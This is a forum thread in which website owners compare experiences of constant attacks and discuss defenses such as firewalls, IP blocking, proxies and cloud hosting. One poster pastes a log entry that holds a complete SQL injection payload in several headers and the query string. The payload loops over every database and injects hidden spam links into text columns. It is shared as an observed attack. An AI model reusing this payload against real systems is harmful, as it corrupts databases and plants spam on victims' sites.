Are anyone else's websites under attack?
 

My websites are under attack on and off continuously. Mostly SQL injection stuff. I invested heavily in defenses, and its paid off, but wow, it just seems like it never lets up. About 3 1/2 years ago I was attacked by Iranians, bringing down many of my sites. That episode cost me a couple hundred thousand dollars. Sometimes I go a couple weeks without much activity, then its thousands of attacks over a few days, then it goes quiet again. Please make me feel better and tell me I'm not the only one :)

They only attack the best and coolest sites!

Nope, I'd say that's pretty usual. Good job and congrats on getting your stuff pretty well protected.

My computer was under attack from a virus a while back. Had a local guy fix it...cost me $40 :)

Constant and persistant threats are the new black...

Ransomware seems to be the big thing right now.

SQL injection? What language is the website written in??

I am running a site/forum on redundant servers located at the company who is also hosting IKEAs sites among other.

My server admin told me the server farm is under constant pressure from the outside. It is like a flood-wall holding back the attackers 24/7. If some minor percentage comes through whole arrays will go down.

So no, you are not the only one.

My WordPress sites seem to be constantly under assault. If they can't get through they move on.

Don't look at your security logs if you ever want to sleep again.

I stopped looking at them a decade ago.

I've had a few clients that have freaked out and tried to go nuclear over a single minor breach attempt until I show them the live logs and they realize this stuff is happening 24/7/365.

It just never ever ends.

Last month I fired up a cloud instance that I needed to run Windows on.

Damn thing got compromised in the first 5 minutes before I could even finish hardening it.

Most of my stuff runs off Linode these days.

One of the advantages is being able to keep multiple distinct public IP's for an instance and swap a clean one in if the primary is being abused.

Does not help if they are coming after you based on FQDN though.

Which reminds me, I need to run something by you.

Been in DC for 3 days, in NJ now and will be in NYC next few days but when I get back I'd appreciate a few minutes of your time if you don't mind.

Probably like 90% of everything dynamic these days, HTML5, CSS, PHP, jquery, and SQL on the backend.

Just managed a project built in Ruby on Rails for the backend and React on the front-end. Chose Rails because I really don't like the inconsistent skill levels with PHP development. Whereas with rails if you follow the conventions it is pretty secure, just harder to find a developer.

PHP developers are a dime a dozen and many won't follow proper conventions. As a language it is getting kinda messy for some web applications. If your project has outsourced PHP, usually the code is the reason for the website being brought down. Ask me how I know!

I develop myself in HTML, CSS and jQuery, but am not versed in PHP or SQL, aside from holding together a "legacy" program. I had a new developer start a project in PHP and saw where it was going and how messy/vulnerable the structure was and cancelled. That was when I began looking for Rails.

What's your thoughts on Rails as a backend stomachmonkey? PS. Used postgres for the database on my new program.

As long as you don't ask me anything technical :)

When the IT guys here start with their jargon, I get instantly lost. Ransomware? Just got a notice from the security service we use giving us a number to call if we get hit with it. Evidently, they've come up with a way to get rid of that form of attack.

Prior to that, I always figured it would be cheaper for me to just buy another computer & start over. Nothing of that much value in our computer anyway. Never posted a credit card number, social security numbers, etc. Still do our finances the old fashioned way...paper.

Anybody ever read the O. Henry story titled "Ransom of Red Chief"? Two bums who kidnapped a rich man's son? I always thought that's kind of how I would handle it if hit with ransomware. With no reward, they'd quit picking on me?

Appreciate the responses. I guess I'm not the only one, which makes ma feel a lot better. Wonder if this situation will get better or worse over time? Seems ridiculous to me.

FWIW, here is a report on one of the attacks from yesterday (one of thousands). I have no idea what this means, but just throwing it out there. I do see "cialis" in the Query String, so I'm assuming its an attempted server hijack for mass spam emailing.

HTTP_ACCEPT:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 HTTP_ACCEPT_ENCODING:gzip,deflate,gzip, deflate HTTP_HOST:xxxxxxxx.com HTTP_REFERER:http://google.com;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then '''''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b-- HTTP_USER_AGENT:Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then '''''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--

ALL_RAW Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,gzip, deflate Host: xxxxxxxx.com Referer: http://google.com;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then '''''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b-- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then '''''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--

QUERY_STRING minprice=&maxprice=&bedrrom=&sqft=;declare%20@b%20 cursor;declare%20@s%20varchar(8000);declare%20@w%2 0varchar(99);set%20@b=cursor%20for%20select%20DB_N AME()%20union%20select%20name%20from%20sys.databas es%20where%20(has_dbaccess(name)!=0)%20and%20name% 20not%20in%20('master','tempdb','model','msdb',DB_ NAME());open%20@b;fetch%20next%20from%20@b%20into% 20@w;while%20@@FETCH_STATUS=0%20begin%20set%20@s=' begin%20try%20use%20'%2B@w%2B';declare%20@c%20curs or;declare%20@d%20varchar(4000);set%20@c=cursor%20 for%20select%20''update%20%5B''%2BTABLE_NAME%2B''% 5D%20set%20%5B''%2BCOLUMN_NAME%2B''%5D=%5B''%2BCOL UMN_NAME%2B''%5D%2Bcase%20ABS(CHECKSUM(NewId()))%2 510%20when%200%20then%20''''''%2Bchar(60)%2B''div% 20style=%22display:none%22''%2Bchar(62)%2B''cialis %20coupon%20''%2Bchar(60)%2B''a%20href=%22http:''% 2Bchar(47)%2Bchar(47)%2B''www.cartoninjas.net''%2B char(47)%2B''page''%2Bchar(47)%2B''Drug-Prescription-Card%22%20rel=%22nofollow%22''%2Bchar(62)%2B'''''' %2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20 then%20''''cialis%20coupon''''%20when%201%20then%2 0''''cialis%20coupon''''%20else%20''''cialis%20cou pon''''%20end%20%2B''''''%2Bchar(60)%2Bchar(47)%2B ''a''%2Bchar(62)%2B''%20cialis%20coupon''%2Bchar(6 0)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''''%20else %20''''''''%20end''%20FROM%20sysindexes%20AS%20i%2 0INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o. id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20O N%20o.NAME=TABLE_NAME%20WHERE(indid%20in%20(0,1))% 20and%20DATA_TYPE%20like%20''%25varchar''%20and(CH ARACTER_MAXIMUM_LENGTH%20in%20(2147483647,-1));open%20@c;fetch%20next%20from%20@c%20into%20@d ;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fe tch%20next%20from%20@c%20into%20@d;end;close%20@c% 20end%20try%20begin%20catch%20end%20catch';exec%20 (@s);fetch%20next%20from%20@b%20into%20@w;end;clos e%20@b--&city=

HTTP_REFERER http://google.com;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then '''''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--

HTTP_USER_AGENT Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then '''''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--

I'm assuming this site has some search function?

On my phone so a bit hard to read but it looks like it's trying to grab all you database tables.

Why could be a variety of things.

Got that part covered, more a viability thing.

I actually prefer PHP primarily since it's so easy to find people.

I only have two guys I work with when it "matters".

I'm less concerned with the language, it's "the guy" that matters.

But we also do a lot of hand off work. Meaning build it for the client then they take it over. That kind of dictates to some degree what is used to build their solution. We don't like doing maintenance stuff.

I also hate being held hostage by proprietary solutions that keep me tied to certain individuals / groups and take that approach with clients. They are more than welcome to retain us long term but the choice is theirs and the work is done in a way that leaves the choice up to them.

What's the consensus on using Cloud Flare as a proxy/screen for these types of attacks?

Long time ago, when I bothered running my own servers, I had to block whole ranges of Chinese and Russian IP addresses. While it didn't take out all attacks, it surely removed 90% of traffic.

I block all IP addresses outside of the U.S.

Everyday I get messages about attacks on my site listed below. Usually Russia, sometimes France and occasionally within the US - assuming no IP spoofing.

Yep, hacker bots trying to spawn spam are as bad or worse than spammers themselves.

Host my own servers on a Cox Business account and they do a very good job of monitoring security and keeping the hackers a bay.

Only had two incidents. A couple of users were using really out of date email clients and their SSL got hacked for their password. Got informed by Cox Business security team within the hour and they blocked the hackers IPs. Changed the accounts passwords and forced users to get new email clients and all is well.

Your best bet is defense in depth; Cisco ASA's with Firepower are now awesome, put some F5's or Netscalers behind them (DMZ) to front the servers and put AMP for Endpoints along with AV on the servers and you should be good from DOS, Malware, etc.

I am pushing to get it mandated that ISP's & government agencies get involved and block at the source; they are already reading our email and watching to see if we are downloading movies, so why not do something useful instead.

It doesn't help that all governments are part of the problem as well.....

Don't overthink this, move your site to Amazon and change elastic ip's every few months. Expensive hardware solutions like ASA, and Palo are not conducive to the little guy.

Amazon and Azure are just as likely to be targets as private systems, that's why they offer virtual protection systems like F5 etc.

But for pennies you can change IP's then reroute with R53. And they do a damn good job on their side preventing DDOS and a lot of other bad stuff.

Got compromised one time... Wasn't sql injection it was an exploit of the open source I was running. They were able to get a pic file in a temp directory and used it for mass spamming. 5 years later our url is finally free of most email blacklists.

I know have a daily scan that checks all core files and file counts and alerts me if anything changes.

Did you request delisting?

I have one client who used to get blacklisted every other month.

Took all of 15 minutes of work to get them delisted from SORBS in 3 days or less.

After reading this thread now I want to move all my hosting to rackspace or bluehost.

Rack space is fine.

Bluehost will work if you like having your IP range regularly blacklisted.